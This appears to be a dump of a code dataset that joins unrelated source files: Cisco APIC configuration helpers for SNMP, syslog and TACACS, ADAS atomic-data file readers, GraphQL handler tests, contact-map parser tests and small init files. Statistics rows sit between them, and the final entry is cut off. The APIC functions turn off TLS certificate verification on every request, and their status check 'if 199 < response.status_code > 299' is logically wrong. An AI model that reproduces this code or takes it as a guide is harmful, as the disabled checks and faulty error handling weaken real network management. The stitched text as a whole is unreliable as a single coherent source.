snmp_community_name=snmp_community_name,
snmp_security_level=snmp_security_level)
cookies = {'APIC-Cookie': auth_token}
response = requests.post(url + '/api/node/mo/uni/fabric/snmpgroup-snmp-conf-converter.json',
cookies=cookies, data=payload, verify=False)
if 199 < response.status_code > 299:
# Do not raise error if object is already there
if " already exists" not in json.loads(response.text)['imdata'][0]['error']['attributes']['text']:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])
def add_snmp_access_policy(url, auth_token):
"""
Creates a SNMP access policy in APIC
:param url:
:param auth_token:
:param snmp_ip:
:return:
"""
template = JSON_TEMPLATES.get_template('add_snmp_access_policy.j2.json')
payload = template.render()
cookies = {'APIC-Cookie': auth_token}
response = requests.post(url + '/api/node/mo/uni/infra/moninfra-default/snmpsrc-conf-converter.json',
cookies=cookies, data=payload, verify=False)
if 199 < response.status_code > 299:
# Do not raise error if object is already there
if " already exists" not in json.loads(response.text)['imdata'][0]['error']['attributes']['text']:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])
def add_snmp_fabric_policy(url, auth_token):
"""
Creates a SNMP access policy in APIC
:param url:
:param auth_token:
:param snmp_ip:
:return:
"""
template = JSON_TEMPLATES.get_template('add_snmp_fabric_policy.j2.json')
payload = template.render()
cookies = {'APIC-Cookie': auth_token}
response = requests.post(url + '/api/node/mo/uni/fabric/monfab-default/snmpsrc-conf-converter.json',
cookies=cookies, data=payload, verify=False)
if 199 < response.status_code > 299:
# Do not raise error if object is already there
if " already exists" not in json.loads(response.text)['imdata'][0]['error']['attributes']['text']:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])
def add_snmp_v3_user(url, auth_token, **kwargs):
"""
Creates a SNMP v3 user in default snmp pod policy
:param url:
:param auth_token:
:param snmp_ip:
:return:
"""
template = JSON_TEMPLATES.get_template('add_snmp_v3_user.j2.json')
payload = template.render(kwargs)
cookies = {'APIC-Cookie': auth_token}
response = requests.post(url + '/api/node/mo/uni/fabric/snmppol-default/user-' + kwargs['username'] + '.json',
cookies=cookies, data=payload, verify=False)
if 199 < response.status_code > 299:
# Do not raise error if object is already there
if " already exists" not in json.loads(response.text)['imdata'][0]['error']['attributes']['text']:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])
def enable_snmp_default_pod_policy(url, auth_token):
"""
Creates a SNMP v3 user in default snmp pod policy
:param url:
:param auth_token:
:return:
"""
template = JSON_TEMPLATES.get_template('enable_snmp_default_pod_policy.j2.json')
payload = template.render()
cookies = {'APIC-Cookie': auth_token}
response = requests.post(url + '/api/node/mo/uni/fabric/snmppol-default.json',
cookies=cookies, data=payload, verify=False)
if 199 < response.status_code > 299:
# Do not raise error if object is already there
if " already exists" not in json.loads(response.text)['imdata'][0]['error']['attributes']['text']:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])
def add_snmp_community_pod_policy(url, auth_token, **kwargs):
"""
Creates a community in the default snmp pod policy
:param url:
:param auth_token:
:return:
"""
template = JSON_TEMPLATES.get_template('add_snmp_community_pod_policy.j2.json')
payload = template.render(kwargs)
cookies = {'APIC-Cookie': auth_token}
response = requests.post(
url + '/api/node/mo/uni/fabric/snmppol-default/community-' + kwargs['community_name'] + '.json',
cookies=cookies, data=payload, verify=False)
if 199 < response.status_code > 299:
# Do not raise error if object is already there
if " already exists" not in json.loads(response.text)['imdata'][0]['error']['attributes']['text']:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])
def add_syslog_group(url, auth_token, syslog_ip):
"""
Creates a SysLog Server in APIC
:param url:
:param auth_token:
:param syslog_ip:
:return:
"""
template = JSON_TEMPLATES.get_template('add_syslog_group.j2.json')
payload = template.render(syslog_ip=syslog_ip)
cookies = {'APIC-Cookie': auth_token}
response = requests.post(url + '/api/node/mo/uni/fabric/slgroup-conf-converter.json',
cookies=cookies, data=payload, verify=False)
if 199 < response.status_code > 299:
# Do not raise error if object is already there
if " already exists" not in json.loads(response.text)['imdata'][0]['error']['attributes']['text']:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])
def add_syslog_access_policy(url, auth_token):
"""
Creates a SysLog access policy in APIC
:param url:
:param auth_token:
:param syslog_ip:
:return:
"""
template = JSON_TEMPLATES.get_template('add_syslog_access_policy.j2.json')
payload = template.render()
cookies = {'APIC-Cookie': auth_token}
response = requests.post(url + '/api/node/mo/uni/infra/moninfra-default/slsrc-conf-converter.json',
cookies=cookies, data=payload, verify=False)
if 199 < response.status_code > 299:
# Do not raise error if object is already there
if " already exists" not in json.loads(response.text)['imdata'][0]['error']['attributes']['text']:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])
def add_syslog_fabric_policy(url, auth_token):
"""
Creates a SysLog fabric policy in APIC
:param url:
:param auth_token:
:param syslog_ip:
:return:
"""
template = JSON_TEMPLATES.get_template('add_syslog_fabric_policy.j2.json')
payload = template.render()
cookies = {'APIC-Cookie': auth_token}
response = requests.post(url + '/api/node/mo/uni/fabric/monfab-default/slsrc-conf-converter.json',
cookies=cookies, data=payload, verify=False)
if 199 < response.status_code > 299:
# Do not raise error if object is already there
if " already exists" not in json.loads(response.text)['imdata'][0]['error']['attributes']['text']:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])
def add_tacacs_provider(url, auth_token, tacacs_ip, tacacs_password):
"""
Creates a Tacacs Server in APIC
:param url:
:param auth_token:
:param tacacs_ip:
:return:
"""
template = JSON_TEMPLATES.get_template('add_tacacs_provider.j2.json')
payload = template.render(tacacs_ip=tacacs_ip,
tacacs_password=tacacs_password)
cookies = {'APIC-Cookie': auth_token}
response = requests.post(url + '/api/node/mo/uni/userext/tacacsext/tacacsplusprovider-' + tacacs_ip + '.json',
cookies=cookies, data=payload, verify=False)
if 199 < response.status_code > 299:
# Do not raise error if object is already there
if " already exists" not in json.loads(response.text)['imdata'][0]['error']['attributes']['text']:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])
def add_tacacs_group(url, auth_token, tacacs_ip):
"""
Creates a Tacacs group in APIC
:param url:
:param auth_token:
:param tacacs_ip:
:return:
"""
template = JSON_TEMPLATES.get_template('add_tacacs_provider_group.j2.json')
payload = template.render(tacacs_ip=tacacs_ip)
cookies = {'APIC-Cookie': auth_token}
response = requests.post(url + '/api/node/mo/uni/userext/tacacsext/tacacsplusprovidergroup-conf-converter.json',
cookies=cookies, data=payload, verify=False)
if 199 < response.status_code > 299:
# Do not raise error if object is already there
if " already exists" not in json.loads(response.text)['imdata'][0]['error']['attributes']['text']:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])
def add_tacacs_login_domain(url, auth_token):
"""
Creates a Tacacs login domain in APIC
:param url:
:param auth_token:
:param tacacs_ip:
:return:
"""
template = JSON_TEMPLATES.get_template('add_login_domain_tacacs.j2.json')
payload = template.render()
cookies = {'APIC-Cookie': auth_token}
response = requests.post(url + '/api/node/mo/uni/userext/logindomain-conf_converter.json',
cookies=cookies, data=payload, verify=False)
if 199 < response.status_code > 299:
# Do not raise error if object is already there
if " already exists" not in json.loads(response.text)['imdata'][0]['error']['attributes']['text']:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])
def add_default_group_policy(url, auth_token):
"""
Creates a pod group policy called default
:param url:
:param auth_token:
:return:
"""
template = JSON_TEMPLATES.get_template('add_default_group_policy.j2.json')
payload = template.render()
cookies = {'APIC-Cookie': auth_token}
response = requests.post(url + '/api/node/mo/uni/fabric/funcprof/podpgrp-default.json',
cookies=cookies, data=payload, verify=False)
if 199 < response.status_code > 299:
# Do not raise error if object is already there
if " already exists" not in json.loads(response.text)['imdata'][0]['error']['attributes']['text']:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])
| 44.173709 | 828 | 0.654427 | 2,429 | 18,818 | 4.956361 | 0.07534 | 0.038874 | 0.053659 | 0.066285 | 0.851317 | 0.814519 | 0.798239 | 0.749398 | 0.724479 | 0.700723 | 0 | 0.01734 | 0.181741 | 18,818 | 425 | 829 | 44.277647 | 0.764515 | 0.286428 | 0 | 0.564516 | 0 | 0.026882 | 0.241008 | 0.120075 | 0 | 0 | 0 | 0 | 0 | 1 | 0.096774 | false | 0.021505 | 0.026882 | 0 | 0.129032 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b810eaf224975e532d563bd0655e6bd8375bdbde | 9,581 | py | Python | src/python2/sdp/model/collision/ADAS_file.py | LeiShi/Synthetic-Diagnostics-Platform | 870120d3fd14b2a3c89c6e6e85625d1e9109a2de | [
"BSD-3-Clause"
] | 5 | 2019-08-16T22:08:19.000Z | 2021-02-24T02:47:05.000Z | src/python2/sdp/model/collision/ADAS_file.py | justthepython/Synthetic-Diagnostics-Platform | 5f1cb5c29d182490acbd4f3c167f0e09ec211236 | [
"BSD-3-Clause"
] | 1 | 2016-05-11T12:58:00.000Z | 2016-05-11T17:18:36.000Z | src/python2/sdp/model/collision/ADAS_file.py | justthepython/Synthetic-Diagnostics-Platform | 5f1cb5c29d182490acbd4f3c167f0e09ec211236 | [
"BSD-3-Clause"
] | 5 | 2018-04-29T12:35:59.000Z | 2020-01-10T03:38:30.000Z | """ class and subclass reading different kind of adas file
"""
import numpy as np
import scipy.interpolate as ip
class ADAS_file(object):
""" Parent class for defining the different kind of database readers.
This class is for inheritence purpose only. It will be inherited
by all the ADAS readers.
It defines how to read a block
of data (:func:`read_block <sdp.plasma.collision.ADAS_file.ADAS_file.read_block>`) [often used in 2D data of the ADAS database].
The beam energy is divided by the atomic mass of the beam particles (eV/amu).
:param str name: Name of the ADAS file
:ivar str self.name: Name of the ADAS file
"""
def __init__(self,name):
""" Save the name of the file
:param name: Name of the ADAS file
:type name: str
:ivar str name: Name of the ADAS file
"""
self.name = name
def read_block(self,data,i,array,n):
""" Read one bloc in an ADAS file
The coefficient depending on two coefficients are written in a block form,
thus this function read the block at the line i and return the
number of the final line
:param data: file currently readed (each index is for a line)
:type data: list[str]
:param i: first line to look at (index of data)
:type i: int
:param array: array where to add the data from the file (should be of the \
good size)
:type array: np.array
:param n: Number of item contained inside the data
:type n: int
:returns: index of the index of the final line
:rtype: int
"""
# loop over all the data block
index = 0
while index is not n:
temp = data[i].split()
# loop over one line for taking all the datas
# inside this line
for j in range(len(temp)):
array[index] = temp[j]
index += 1
i += 1
return i
class ADAS21(ADAS_file):
""" Class containing all the data from one ADAS file (adf21)
The data contained in this kind of file is the beam stopping coefficient.
The beam energy is divided by the atomic mass of the beam particles (eV/amu).
:param name: Name of the ADAS file
:type name: str
:ivar int n_b: Size of the beam energy dimension
:ivar int n_density: Size of the density dimension
:ivar float T_ref: Reference temperature (eV)
:ivar np.array[n_b] adas_beam: Beam energies considered (eV/amu)
:ivar np.array[n_density] densities: Densities considered (m :sup:`-3`)
:ivar np.array[n_density,n_b] coef_dens: Beam stopping coefficient as a function\
of the density and the beam energy (m :sup:`3`/s)
:ivar int n_T: Size of the temperature dimension
:ivar float E_ref: Reference beam energy (eV/amu)
:ivar float dens_ref: Reference density (m :sup:`-3`)
:ivar np.array[n_T] temperature: Temperatures considered (eV)
:ivar np.array[n_T] coef_T: Beam stopping coefficient as a function of the temperature (m :sup:`3`/s)
"""
def __init__(self,name):
""" Read the file and store all the values.
:param name: Name of the ADAS file
:type name: str
"""
super(ADAS21, self).__init__(name)
# open the file and store all the text in data
f = open(self.name,'r')
data = f.read().split('\n')
f.close()
temp = data[2].split()
# number of different beams in the ADAS file
self.n_b = int(temp[0]) #! (this sign indicates an attribute)
# change of unit
# number of different densities for the target
self.n_density = int(temp[1]) #!
# reference temperature
self.T_ref = float(temp[2].split('=')[1]) #!
# list of all beams computed by ADAS
self.adas_beam = np.zeros(self.n_b) #!
# line number in the ADAS file
i = 4
# read all the beam energies taken in account in the
# ADAS file
i = self.read_block(data,i,self.adas_beam,self.n_b)
# same as before but with the densities
self.densities = np.zeros(self.n_density) #!
i = self.read_block(data,i,self.densities,self.n_density)
# change of unit cm-3 -> m-3
self.densities *= 100.0**3
i += 1 # remove line with ----
# contains the coefficients as a function of densities and the beam
# energies
self.coef_dens = np.zeros((self.n_density,self.n_b))
# coef_dens[i,j] -- i for beam, j for densities #!
for j in range(self.n_density):
i = self.read_block(data,i,self.coef_dens[j],self.n_b)
i += 1 # remove line with ----
# change of unit cm -> m
self.coef_dens /= 100.0**3
temp = data[i].split()
self.n_T = int(temp[0]) # number of different temperature #!
# reference energy
self.E_ref = float(temp[1].split('=')[1]) #!
# reference density
self.dens_ref = float(temp[2].split('=')[1])*100**3 #!
i += 2 # goes to next line, and remove line with ----
# list of temperature
self.temperature = np.zeros(self.n_T) #!
i = self.read_block(data,i,self.temperature,self.n_T)
i += 1 # remove line with ----
# read the coefficients as a function of the temperature
self.coef_T = np.zeros(self.n_T) #!
i = self.read_block(data,i,self.coef_T,self.n_T)
# change of unit
self.coef_T /= 100.0**3
# END OF READING
class ADAS22(ADAS_file):
""" Class containing all the data from one ADAS file (adf22)
The data contained in this kind of file is the emission coefficient.
The beam energy is divided by the atomic mass of the beam particles (eV/amu).
:param name: Name of the ADAS file
:type name: str
:ivar int n_b: Size of the beam energy dimension
:ivar int n_density: Size of the density dimension
:ivar float T_ref: Reference temperature (eV)
:ivar np.array[n_b] adas_beam: Beam energies considered (eV/amu)
:ivar np.array[n_density] densities: Densities considered (m :sup:`-3`)
:ivar np.array[n_density,n_b] coef_dens: Emission coefficient as a function\
of the density and the beam energy (m :sup:`3`/s)
:ivar int n_T: Size of the temperature dimension
:ivar float E_ref: Reference beam energy (eV/amu)
:ivar float dens_ref: Reference density (m :sup:`-3`)
:ivar np.array[n_T] temperature: Temperatures considered (eV)
:ivar np.array[n_T] coef_T: Emission coefficient as a function of the temperature (m :sup:`3`/s)
"""
def __init__(self,name):
""" Read the file and store everything as attributes
Arguments:
name -- name of the file
"""
super(ADAS22, self).__init__(name)
# open the file and store all the text in data
f = open(self.name,'r')
data = f.read().split('\n')
f.close()
temp = data[2].split()
# number of different beams in the ADAS file
self.n_b = int(temp[0]) #! (this sign indicates an attribute)
# change of unit
# number of different densities for the target
self.n_density = int(temp[1]) #!
# reference temperature
self.T_ref = float(temp[2].split('=')[1]) #!
# list of all beams computed by ADAS
self.adas_beam = np.zeros(self.n_b) #!
# line number in the ADAS file
i = 4
# read all the beam energies taken in account in the
# ADAS file
i = self.read_block(data,i,self.adas_beam,self.n_b)
# same as before but with the densities
self.densities = np.zeros(self.n_density) #!
i = self.read_block(data,i,self.densities,self.n_density)
# change of unit cm-3 -> m-3
self.densities *= 100.0**3
i += 1 # remove line with ----
# contains the coefficients as a function of densities and the beam
# energies
self.coef_dens = np.zeros((self.n_density,self.n_b))
# coef_dens[i,j] -- i for beam, j for densities #!
for j in range(self.n_density):
i = self.read_block(data,i,self.coef_dens[j],self.n_b)
i += 1 # remove line with ----
# change of unit cm -> m
self.coef_dens /= 100.0**3
temp = data[i].split()
self.n_T = int(temp[0]) # number of different temperature #!
# reference energy
self.E_ref = float(temp[1].split('=')[1]) #!
# reference density
self.dens_ref = float(temp[2].split('=')[1])*100**3 #!
i += 2 # goes to next line, and remove line with ----
# list of temperature
self.temperature = np.zeros(self.n_T) #!
i = self.read_block(data,i,self.temperature,self.n_T)
i += 1 # remove line with ----
# read the coefficients as a function of the temperature
self.coef_T = np.zeros(self.n_T) #!
i = self.read_block(data,i,self.coef_T,self.n_T)
# change of unit
self.coef_T /= 100.0**3
# END OF READING
| 36.708812 | 132 | 0.579793 | 1,400 | 9,581 | 3.880714 | 0.128571 | 0.027609 | 0.026321 | 0.022087 | 0.787778 | 0.787778 | 0.782809 | 0.771029 | 0.766611 | 0.766611 | 0 | 0.014787 | 0.322409 | 9,581 | 260 | 133 | 36.85 | 0.822089 | 0.541488 | 0 | 0.8125 | 0 | 0 | 0.003084 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05 | false | 0 | 0.025 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
62edaa1e325beae4fabc588cf1cdc99434e8b794 | 120 | py | Python | csgoinvshuffle/__init__.py | kreyoo/csgo-inv-shuffle | 6392dd1eef1ca87ec25c9cf4845af3f8df3594a5 | [
"MIT"
] | null | null | null | csgoinvshuffle/__init__.py | kreyoo/csgo-inv-shuffle | 6392dd1eef1ca87ec25c9cf4845af3f8df3594a5 | [
"MIT"
] | 5 | 2021-12-22T19:25:51.000Z | 2022-03-28T19:27:34.000Z | csgoinvshuffle/__init__.py | kreyoo/csgo-inv-shuffle | 6392dd1eef1ca87ec25c9cf4845af3f8df3594a5 | [
"MIT"
] | null | null | null | # flake8: noqa
from csgoinvshuffle.shuffle import ShuffleConfig
from csgoinvshuffle.inventory import get_inventory
| 24 | 51 | 0.833333 | 13 | 120 | 7.615385 | 0.692308 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009615 | 0.133333 | 120 | 4 | 52 | 30 | 0.942308 | 0.1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
1a02a187fddf59fcbd0886d14177835d9bc97547 | 5,290 | py | Python | tests/integration/test_handlers.py | singingwolfboy/tartiflette-aiohttp | c805ef37a6ba7182f59fa9555fce5f0154e13dd5 | [
"MIT"
] | 40 | 2019-05-28T04:24:45.000Z | 2021-12-26T10:04:11.000Z | tests/integration/test_handlers.py | singingwolfboy/tartiflette-aiohttp | c805ef37a6ba7182f59fa9555fce5f0154e13dd5 | [
"MIT"
] | 116 | 2019-06-19T18:39:11.000Z | 2022-03-28T07:06:24.000Z | tests/integration/test_handlers.py | singingwolfboy/tartiflette-aiohttp | c805ef37a6ba7182f59fa9555fce5f0154e13dd5 | [
"MIT"
] | 7 | 2020-01-25T12:06:59.000Z | 2021-11-08T15:39:22.000Z | try:
from contextlib import asynccontextmanager # Python 3.7+
except ImportError:
from async_generator import asynccontextmanager # Python 3.6
from functools import partial
from unittest.mock import Mock
import pytest
from tartiflette_aiohttp import default_context_factory
def prepare_response(_, data, __):
return data
@pytest.mark.asyncio
async def test_handler__handle_query__context_unicity():
from tartiflette import Resolver, create_engine
from tartiflette_aiohttp._handler import Handlers
@Resolver(
"Query.hello",
schema_name="test_handler__handle_query__context_unicity",
)
async def resolver_hello(parent, args, ctx, info):
try:
ctx["counter"] += 1
except:
ctx["counter"] = 1
return "hello " + str(ctx["counter"])
tftt_engine = await create_engine(
"""
type Query {
hello(name: String): String
}
""",
schema_name="test_handler__handle_query__context_unicity",
)
a_req = Mock()
a_req.app = {
"ttftt_engine": tftt_engine,
"response_formatter": prepare_response,
}
context_factory = partial(default_context_factory, {})
async def _get_param(*_, **__):
return ('query { hello(name: "Chuck") }', None, None)
await Handlers._handle(_get_param, a_req, context_factory)
await Handlers._handle(_get_param, a_req, context_factory)
b_response = await Handlers._handle(_get_param, a_req, context_factory)
assert b_response == {"data": {"hello": "hello 1"}}
@pytest.mark.asyncio
async def test_handler__handle_query__context_manager_as_factory():
from tartiflette import Resolver, create_engine
from tartiflette_aiohttp._handler import Handlers
@Resolver(
"Query.hello",
schema_name="test_handler__handle_query__context_manager_as_factory",
)
async def resolver_hello(parent, args, ctx, info):
return "hello " + ", ".join(ctx.keys())
tftt_engine = await create_engine(
"""
type Query {
hello(name: String): String
}
""",
schema_name="test_handler__handle_query__context_manager_as_factory",
)
req = Mock()
req.app = {
"ttftt_engine": tftt_engine,
"response_formatter": prepare_response,
}
@asynccontextmanager
async def custom_context_factory(context, req):
context["entered"] = True
yield context
context["exited"] = True
context = {}
context_factory = partial(custom_context_factory, context)
async def _get_param(*_, **__):
return ('query { hello(name: "Chuck") }', None, None)
response = await Handlers._handle(_get_param, req, context_factory)
assert context.get("entered")
assert context.get("exited")
assert response == {"data": {"hello": "hello entered"}}
@pytest.mark.asyncio
async def test_handler__handle_query__operation_name():
from tartiflette import Resolver, create_engine
from tartiflette_aiohttp._handler import Handlers
@Resolver(
"Query.hello", schema_name="test_handler__handle_query__operation_name"
)
async def resolver_hello(parent, args, ctx, info):
return "hello " + args["name"]
tftt_engine = await create_engine(
"""
type Query {
hello(name: String): String
}
""",
schema_name="test_handler__handle_query__operation_name",
)
a_req = Mock()
a_req.app = {
"ttftt_engine": tftt_engine,
"response_formatter": prepare_response,
}
context_factory = partial(default_context_factory, {})
async def _get_param(*_, **__):
return (
"""
query A { hello(name: "Foo") }
query B { hello(name: "Bar") }
query C { hello(name: "Baz") }
""",
None,
"B",
)
result = await Handlers._handle(
_get_param,
a_req,
context_factory,
)
assert result == {"data": {"hello": "hello Bar"}}
@pytest.mark.asyncio
async def test_handler__handle_query__prepare_response_is_called():
from tartiflette import Resolver, create_engine
from tartiflette_aiohttp._handler import Handlers
@Resolver(
"Query.hello",
schema_name="test_handler__handle_query__prepare_response_is_called",
)
async def resolver_hello(parent, args, ctx, info):
return "hello " + ", ".join(ctx.keys())
tftt_engine = await create_engine(
"""
type Query {
hello(name: String): String
}
""",
schema_name="test_handler__handle_query__prepare_response_is_called",
)
req = Mock()
req.app = {
"ttftt_engine": tftt_engine,
"response_formatter": Mock(side_effect=prepare_response),
}
@asynccontextmanager
async def custom_context_factory(context, req):
yield context
context = {}
context_factory = partial(custom_context_factory, context)
async def _get_param(*_, **__):
return ('query { hello(name: "Chuck") }', None, None)
response = await Handlers._handle(_get_param, req, context_factory)
assert req.app["response_formatter"].called
| 27.128205 | 79 | 0.643856 | 579 | 5,290 | 5.495682 | 0.143351 | 0.074796 | 0.064111 | 0.082967 | 0.808297 | 0.808297 | 0.799497 | 0.799497 | 0.762728 | 0.704903 | 0 | 0.00177 | 0.252552 | 5,290 | 194 | 80 | 27.268041 | 0.802984 | 0.004159 | 0 | 0.572519 | 0 | 0 | 0.166352 | 0.080872 | 0 | 0 | 0 | 0 | 0.045802 | 1 | 0.007634 | false | 0 | 0.114504 | 0.007634 | 0.19084 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1a165df035c59673db52d5bc54e80f81a1cbbf2f | 3,767 | py | Python | conkit/io/tests/test_bbcontacts.py | mesdaghi/conkit | 01468761352bd3ac5078e5e9fef6f73c8c49036e | [
"BSD-3-Clause"
] | 12 | 2017-06-12T17:20:32.000Z | 2021-12-10T09:35:26.000Z | conkit/io/tests/test_bbcontacts.py | mesdaghi/conkit | 01468761352bd3ac5078e5e9fef6f73c8c49036e | [
"BSD-3-Clause"
] | 60 | 2017-02-08T19:29:34.000Z | 2022-03-17T16:00:54.000Z | conkit/io/tests/test_bbcontacts.py | mesdaghi/conkit | 01468761352bd3ac5078e5e9fef6f73c8c49036e | [
"BSD-3-Clause"
] | 12 | 2017-09-25T07:25:35.000Z | 2022-02-27T18:59:13.000Z | """Testing facility for conkit.io.Bbcontacts"""
__author__ = "Felix Simkovic"
__date__ = "26 Oct 2016"
import os
import unittest
from conkit.io.bbcontacts import BbcontactsParser
from conkit.io.tests.helpers import ParserTestCase
class TestBbcontactsParser(ParserTestCase):
def test_read_1(self):
content = """#identifier diversity direction viterbiscore indexpred state res1 res2
1EAZ 0.65 Antiparallel 9.860725 1 first 29 24
1EAZ 0.65 Antiparallel 9.860725 1 internal 30 23
1EAZ 0.65 Antiparallel 9.860725 1 last 31 22
1EAZ 0.65 Parallel -6.855870 29 first 87 54
1EAZ 0.65 Parallel -6.855870 29 internal 88 55
1EAZ 0.65 Parallel -6.855870 29 last 89 56
"""
f_name = self.tempfile(content=content)
with open(f_name, "r") as f_in:
contact_file = BbcontactsParser().read(f_in)
contact_map1 = contact_file.top_map
self.assertEqual(1, len(contact_file))
self.assertEqual(6, len(contact_map1))
self.assertEqual([24, 23, 22, 54, 55, 56], [c.res1_seq for c in contact_map1])
self.assertEqual([29, 30, 31, 87, 88, 89], [c.res2_seq for c in contact_map1])
self.assertEqual(
sorted([9.860725, 9.860725, 9.860725, -6.855870, -6.855870, -6.855870]),
sorted([c.raw_score for c in contact_map1]),
)
def test_read_2(self):
content = """#identifier diversity direction viterbiscore indexpred state res1 res2
1EAZ 0.65 Antiparallel 9.860725 1 first 29 24
1EAZ 0.65 Antiparallel 9.860725 1 last 30 23
1EAZ 0.65 Parallel -6.855870 29 first 87 54
"""
f_name = self.tempfile(content=content)
with open(f_name, "r") as f_in:
contact_file = BbcontactsParser().read(f_in, del_one_two=True)
contact_map1 = contact_file.top_map
self.assertEqual(1, len(contact_file))
self.assertEqual(0, len(contact_map1))
def test_read_3(self):
content = """#identifier diversity direction viterbiscore indexpred state res1 res2
1EAZ 0.65 Antiparallel 9.860725 1 first 29 24
1EAZ 0.65 Antiparallel 9.860725 1 internal 30 23
1EAZ 0.65 Antiparallel 9.860725 1 last 31 22
1EAZ 0.65 Parallel -6.855870 29 first 87 54
1EAZ 0.65 Parallel -6.855870 29 internal 88 55
1EAZ 0.65 Parallel -6.855870 29 last 89 56
1EAZ 0.65 Antiparallel 0.000000 1 first 100 24
1EAZ 0.65 Antiparallel 0.000000 1 last 101 23
1EAZ 0.65 Parallel 0.000000 29 first 100 15
"""
f_name = self.tempfile(content=content)
with open(f_name, "r") as f_in:
contact_file = BbcontactsParser().read(f_in, del_one_two=False)
contact_map1 = contact_file.top_map
self.assertEqual(1, len(contact_file))
self.assertEqual(9, len(contact_map1))
self.assertEqual([24, 23, 22, 54, 55, 56, 24, 23, 15], [c.res1_seq for c in contact_map1])
self.assertEqual([29, 30, 31, 87, 88, 89, 100, 101, 100], [c.res2_seq for c in contact_map1])
self.assertEqual(
sorted([9.860725, 9.860725, 9.860725, -6.855870, -6.855870, -6.855870, 0.0, 0.0, 0.0]),
sorted([c.raw_score for c in contact_map1]),
)
if __name__ == "__main__":
unittest.main(verbosity=2)
| 48.922078 | 104 | 0.575259 | 508 | 3,767 | 4.13189 | 0.187008 | 0.042878 | 0.060029 | 0.090519 | 0.844212 | 0.814674 | 0.814674 | 0.788947 | 0.787041 | 0.756551 | 0 | 0.196393 | 0.337669 | 3,767 | 76 | 105 | 49.565789 | 0.64489 | 0.010884 | 0 | 0.545455 | 0 | 0 | 0.45 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 1 | 0.045455 | false | 0 | 0.060606 | 0 | 0.121212 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a7e1d0a60216acb1aae2a0ac9b9d5edaddc8bd81 | 45 | py | Python | api/models/__init__.py | pythonkr/pyconkr-api | 077e122a0af37122c5b424870cf91b8fca91a9f5 | [
"Apache-2.0"
] | 25 | 2018-12-09T07:56:16.000Z | 2020-12-24T08:20:41.000Z | api/models/__init__.py | pythonkr/pyconkr-api | 077e122a0af37122c5b424870cf91b8fca91a9f5 | [
"Apache-2.0"
] | 100 | 2018-12-13T02:01:42.000Z | 2022-03-11T23:40:25.000Z | api/models/__init__.py | pythonkr/pyconkr-api | 077e122a0af37122c5b424870cf91b8fca91a9f5 | [
"Apache-2.0"
] | 8 | 2019-01-05T05:02:27.000Z | 2019-08-09T08:14:49.000Z | from .program import *
from .review import *
| 15 | 22 | 0.733333 | 6 | 45 | 5.5 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.177778 | 45 | 2 | 23 | 22.5 | 0.891892 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c50cf38641274a902d4599be0f8fdc911694bf87 | 87 | py | Python | Algorithm/__init__.py | Errare-humanum-est/ProtoGen | e8701dbfabb9c5148abc649fc76c5095d9cc4f9f | [
"MIT"
] | 13 | 2018-06-10T07:14:31.000Z | 2022-01-06T20:44:16.000Z | Algorithm/__init__.py | Errare-humanum-est/ProtoGen | e8701dbfabb9c5148abc649fc76c5095d9cc4f9f | [
"MIT"
